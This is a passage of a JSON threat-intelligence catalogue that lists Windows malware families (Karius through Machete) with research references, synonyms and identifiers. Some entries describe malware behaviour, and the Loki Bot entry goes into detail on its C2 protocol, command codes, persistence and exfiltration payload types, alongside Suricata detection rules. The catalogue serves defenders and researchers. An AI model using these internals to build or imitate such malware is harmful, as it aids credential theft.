\"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius", "https://research.checkpoint.com/banking-trojans-development/", "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/" ], "synonyms": [], "type": [] }, "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", "value": "Karius" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "https://www.threatconnect.com/blog/kasperagent-malware-campaign/" ], "synonyms": [], "type": [] }, "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c", "value": "KasperAgent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar", "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" ], "synonyms": [], "type": [] }, "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca", "value": "Kazuar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip" ], "synonyms": [], "type": [] }, "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", "value": "Kegotip" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", "https://en.wikipedia.org/wiki/Kelihos_botnet" ], "synonyms": [], "type": [] }, "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", "value": "Kelihos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy", "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", "https://citizenlab.ca/2016/11/parliament-keyboy/", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/" ], "synonyms": [ "TSSL" ], "type": [] }, "uuid": "28c13455-7f95-40a5-9568-1e8732503507", "value": "KeyBoy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3", "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/", "https://twitter.com/smoothimpact/status/773631684038107136", "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" ], "synonyms": [], "type": [] }, "uuid": "68039fbe-2eee-4666-b809-32a011e9852a", "value": "APT3 Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" ], "synonyms": [], "type": [] }, "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", "value": "KEYMARBLE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keypass", "https://securelist.com/keypass-ransomware/87412/" ], "synonyms": [], "type": [] }, "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd", "value": "KeyPass" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/", "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor" ], "synonyms": [], "type": [] }, "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047", "value": "KHRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], "type": [] }, "uuid": "f2ca304f-6577-4f3a-983c-beec447a9493", "value": "Kikothac" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" ], "synonyms": [], "type": [] }, "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", "value": "KillDisk" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", "https://www.youtube.com/watch?v=C-dEOt0GzSE", "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", "https://www.vkremez.com/2018/10/lets-learn-exploring-zeusvm-banking.html", "https://github.com/nyx0/KINS" ], "synonyms": [ "Kasper Internet Non-Security", "Maple" ], "type": [] }, "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", "value": "KINS" }, { "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ "Joglog" ], "type": [] }, "uuid": "618b6f23-fc83-4aff-8b0a-7f7138be625c", "value": "KleptoParasite Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://www.morphick.com/resources/news/klrd-keylogger" ], "synonyms": [], "type": [] }, "uuid": "70459959-5a20-482e-b714-2733f5ff310e", "value": "KLRD" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", "https://github.com/zerosum0x0/koadic" ], "synonyms": [], "type": [] }, "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6", "value": "Koadic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt", "https://twitter.com/struppigel/status/812726545173401600" ], "synonyms": [], "type": [] }, "uuid": "f7674d06-450a-4150-9180-afef94cce53c", "value": "KokoKrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant", "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/", "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html" ], "synonyms": [], "type": [] }, "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf", "value": "Konni" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" ], "synonyms": [], "type": [] }, "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3", "value": "KoobFace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia", "https://securitykitten.github.io/2014/11/25/curious-korlia.html", "https://camal.coseinc.com/publish/2013Bisonal.pdf", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit", "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf" ], "synonyms": [ "Bisonal" ], "type": [] }, "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7", "value": "Korlia" }, { "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter", "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf", "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless" ], "synonyms": [], "type": [] }, "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e", "value": "Kovter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/" ], "synonyms": [], "type": [] }, "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d", "value": "KPOT Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken", "https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/", "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/", "https://www.recordedfuture.com/kraken-cryptor-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "3d7ae6b9-8161-470e-a7b6-752151b21657", "value": "Kraken" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/", "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf" ], "synonyms": [ "BlackMoon" ], "type": [] }, "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce", "value": "KrBanker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader", "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework" ], "synonyms": [], "type": [] }, "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972", "value": "KrDownloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en", "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" ], "synonyms": [ "Osiris" ], "type": [] }, "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17", "value": "Kronos" }, { "description": "A keylogger used by Turla.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t", "https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/" ], "synonyms": [], "type": [] }, "uuid": "aa93d030-abef-4215-bc9e-6c7483562d19", "value": "KSL0T" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" ], "synonyms": [ "Barys", "Gofot", "Kuaibpy" ], "type": [] }, "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7", "value": "Kuaibu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz" ], "synonyms": [], "type": [] }, "uuid": "f9b3757e-99c7-4999-8b79-87609407f895", "value": "Kuluoz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", "value": "Kurton" }, { "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" ], "synonyms": [], "type": [] }, "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3", "value": "Kwampirs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", "http://adelmas.com/blog/longhorn.php", "https://www.youtube.com/watch?v=jeLd-gw2bWo", "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" ], "synonyms": [], "type": [] }, "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", "value": "Lambert" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin", "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" ], "synonyms": [], "type": [] }, "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", "value": "Lamdelin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html", "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access", "http://malware-traffic-analysis.net/2017/04/25/index.html", "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/", "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/" ], "synonyms": [], "type": [] }, "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0", "value": "LatentBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus", "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", "https://twitter.com/PhysicalDrive0/status/828915536268492800", "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html", "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html" ], "synonyms": [], "type": [] }, "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", "value": "Lazarus (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok", "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" ], "synonyms": [], "type": [] }, "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", "value": "Laziok" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" ], "synonyms": [], "type": [] }, "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", "value": "Leash" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia", "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html", "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html" ], "synonyms": [ "shoco" ], "type": [] }, "uuid": "41da41aa-0729-428a-8b82-636600f8e230", "value": "Leouncia" }, { "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", "http://www.malware-traffic-analysis.net/2017/11/02/index.html", "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/" ], "synonyms": [], "type": [] }, "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", "value": "Lethic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail" ], "synonyms": [], "type": [] }, "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", "value": "Limitail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] }, "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", "value": "Listrix" }, { "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. \r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", "https://github.com/zettabithf/LiteHTTP", "https://malware.news/t/recent-litehttp-activities-and-iocs/21053" ], "synonyms": [], "type": [] }, "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", "value": "LiteHTTP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", "value": "Locky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" ], "synonyms": [], "type": [] }, "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", "value": "Locky (Decryptor)" }, { "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader" ], "synonyms": [], "type": [] }, "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", "value": "Locky Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" ], "synonyms": [], "type": [] }, "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", "value": "LockPOS" }, { "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" ], "synonyms": [ "Nymeria" ], "type": [] }, "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", "value": "Loda" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" ], "synonyms": [], "type": [] }, "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", "value": "Logedrut" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" ], "synonyms": [], "type": [] }, "uuid": "2789b246-d762-4d38-8cc8-302293e314da", "value": "LogPOS" }, { "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", "https://github.com/R3MRUM/loki-parse", "http://www.malware-traffic-analysis.net/2017/06/12/index.html", "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", "http://blog.fernandodominguez.me/lokis-antis-analysis/", "https://phishme.com/loki-bot-malware/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/" ], "synonyms": [ "Loki", "LokiBot", "LokiPWS" ], "type": [] }, "uuid": "b8fa5036-813f-4887-b4d4-bb17b4a7eba0", "value": "Loki Password Stealer (PWS)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lordix", "https://twitter.com/hexlax/status/1058356670835908610" ], "synonyms": [], "type": [] }, "uuid": "fa61a690-fd9c-4036-97fb-bf3674aa60b2", "value": "Lordix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark" ], "synonyms": [], "type": [] }, "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", "value": "Luminosity RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk", "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" ], "synonyms": [], "type": [] }, "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", "value": "Lurk" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo" ], "synonyms": [], "type": [] }, "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", "value": "Luzo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit", "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" ], "synonyms": [ "Adneukine", "Bomba Locker", "Lucky Locker" ], "type": [] }, "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", "value": "Lyposit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", "https://securelist.com/el-machete/66108/", "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" ], "synonyms": [ "El Machete" ], "type": [] }, "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff", "value": "Machete" }, { "description": "", "meta": { "refs": [ 